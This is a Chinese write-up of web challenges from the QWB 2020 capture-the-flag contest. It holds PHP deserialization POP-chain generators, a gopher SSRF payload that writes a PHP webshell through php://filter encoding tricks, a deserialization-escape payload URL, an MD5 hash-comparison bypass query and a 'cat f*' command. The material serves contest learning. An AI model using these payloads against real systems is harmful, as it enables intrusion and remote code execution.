强网杯2020 writeup
原文地址:http://phoebe233.cn/?p=242
被二进制爷爷们带飞Orz
Web
half_infiltration
首先反序列化,由于 print 之后无论走哪都会有 ob_end_clean(),永远也不会输出,所以尝试在输出之后让它报错来绕过
这样 global $$this 就会输出并报错
传入两个User,一个输出,一个报错绕过ob_end_clean()
<?php
// Placeholder secret the challenge guards; the real value is not part of this listing.
$flag = 'flag{aaaa}';
/**
 * Opens an output buffer and prints the global $result into it.
 *
 * Nothing here closes the buffer, so whether the buffered text ever reaches
 * the client is decided by whatever runs afterwards (see User::__destruct).
 */
class Pass
{
    public function read()
    {
        ob_start();
        global $result;
        echo $result;
    }
}
/**
 * Destructor that dispatches a method call chosen by the object's own fields.
 *
 * Because this runs when an unserialize()d object is released, the three
 * public properties are effectively request input: $age is the receiver,
 * $sex the method name, $num a variable name pulled into global scope.
 * The call happens BEFORE the type check, and the rejecting branch both
 * discards the output buffer and exits. The root cause is unserialize()
 * on user-controlled data; the fix is to never deserialize untrusted input.
 */
class User
{
    public $age, $sex, $num;

    public function __destruct()
    {
        $receiver = $this->age;
        $method   = $this->sex;
        $varName  = $this->num;

        // Dispatch first, validate afterwards — the order is part of the challenge.
        $receiver->$method();

        $wellFormed = is_string($varName) && is_string($method) && is_object($receiver);
        if (!$wellFormed) {
            ob_end_clean();
            exit();
        }

        // Imports the named global. A name that cannot be re-bound (the page uses
        // "this") errors out here, which is what skips the cleanup path above.
        global $$varName;
        $result = $GLOBALS['flag'];
    }
}
// Challenge entry point: whatever arrives in ?x= is deserialized as-is, which is
// what makes every magic method in the classes above reachable from a request.
if (isset($_GET['x'])) {
    unserialize($_GET['x']);
}

// Generator for the page's two-object chain. Both objects call Pass::read();
// the first imports $result (produces output), the second names "this" (errors).
$reader = new Pass();

$printer = new User();
$printer->age = $reader;
$printer->sex = "read";
$printer->num = 'result';

$crasher = new User();
$crasher->age = $reader;
$crasher->sex = "read";
$crasher->num = "this";

echo urlencode(serialize([$printer, $crasher]));
读到ssrf.php
内网端口探测为40000,内网服务:
源码处看到 form 表单,题目告知有 uploads 文件夹,猜测是文件上传处,发现 PHPSESSID 会创建一个文件夹,然后想写 shell 时发现有过滤,file 这里可以用二次 URL 编码绕过一些字符,然后大小写绕过 base64 过滤,content 文件内容也有过滤,还把 PD9 给 ban 了,考虑用 php filter 组合过滤器绕过
生成gopher打40000端口
gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ
命令执行需要二次编码
这过滤也是挺狠
强网先锋
web辅助
反序列化逃逸,安恒月赛都有类似的题了,没意思
/**
 * Credential holder. All three properties are protected, so their serialized
 * names carry the "\0*\0" prefix that read()/write() below rewrite.
 */
class player
{
    protected $user;
    protected $pass;
    protected $admin;

    public function __construct($user, $pass, $admin = 0)
    {
        [$this->user, $this->pass, $this->admin] = [$user, $pass, $admin];
    }

    /** Returns the admin flag exactly as it was stored (no coercion). */
    public function get_admin()
    {
        return $this->admin;
    }
}
class topsolo
{
    protected $name;

    public function __construct($name = 'Riven')
    {
        $this->name = $name;
    }

    /**
     * Invokes $name when it is an object. gettype() reports closures as
     * "object" as well, so the original "function" comparison was unreachable;
     * is_object() covers exactly the same inputs.
     */
    public function TP()
    {
        if (!is_object($this->name)) {
            return;
        }
        $callee = $this->name;
        $callee();
    }

    /** Runs TP() automatically on unserialize — the first link of the page's chain. */
    public function __wakeup()
    {
        $this->TP();
    }
}
class midsolo
{
    protected $name;

    public function __construct($name)
    {
        $this->name = $name;
    }

    /** Forces the name back to 'Yasuo' whenever the object comes out of unserialize(). */
    public function __wakeup()
    {
        if ($this->name === 'Yasuo') {
            return;
        }
        $this->name = 'Yasuo';
        echo "No Yasuo! No Soul!\n";
    }

    public function __invoke()
    {
        $this->Gank();
    }

    /**
     * stristr() stringifies $name, so an object stored there goes through its
     * __toString() — that conversion is how jungle::KS() is reached in the chain.
     */
    public function Gank()
    {
        echo stristr($this->name, 'Yasuo') ? "Are you orphan?\n" : "Must Be Yasuo!\n";
    }
}
class jungle
{
    protected $name = "";

    public function __construct($name = "Lee Sin")
    {
        $this->name = $name;
    }

    /** The sink of the chain: dumps phpinfo() to the output. */
    public function KS()
    {
        phpinfo();
    }

    /** Any string conversion triggers KS() and yields an empty string. */
    public function __toString(): string
    {
        $this->KS();
        return "";
    }
}
/**
 * Inverse of write(): turns the 6-byte literal '\0*\0' back into the
 * NUL-wrapped '*' that serialized protected property names carry.
 * The two forms differ in length, which is why applying this after
 * serialize() desynchronizes the declared string lengths.
 */
function read($data)
{
    return str_replace('\0*\0', chr(0) . '*' . chr(0), $data);
}
/**
 * Replaces the NUL-wrapped '*' of protected property names with the
 * 6-byte literal '\0*\0'; read() reverses it.
 */
function write($data)
{
    return str_replace(chr(0) . '*' . chr(0), '\0*\0', $data);
}
// Builds the page's chain: jungle (sink) inside midsolo (invokable) inside topsolo (__wakeup caller).
$d=new jungle(NULL);
$c=new midsolo($d);
$b=new topsolo($c);
$payload=(serialize($b));
// In a double-quoted string "\\0*\\0" is the 6-byte literal backslash-0-star-backslash-0,
// i.e. the form write() emits and read() shrinks to 3 bytes — the length drift this escape relies on.
$a="\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0";
//$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
// NOTE(review): the "0*0" inside these property keys appears to have lost its NUL bytes in rendering;
// the payload below carries them as %00*%00.
$b='";s:7:"0*0pass";s:0:"";s:8:"0*0admin";'.$payload;
echo $b."\n";
// Mirrors the server side: serialize, write(), then read() — the last step is where the lengths stop matching.
echo read(write(serialize(new player($a,$b))))."\n";
payload
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";O:7:"topsolo":2:{S:7:"\00*\00\6e\61\6d\65";O:7:"midsolo":1:{S:7:"\00*\00\6e\61\6d\65";O:6:"jungle":1:{S:7:"\00*\00\6e\61\6d\65";N
funhash
?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop
主动
cat f*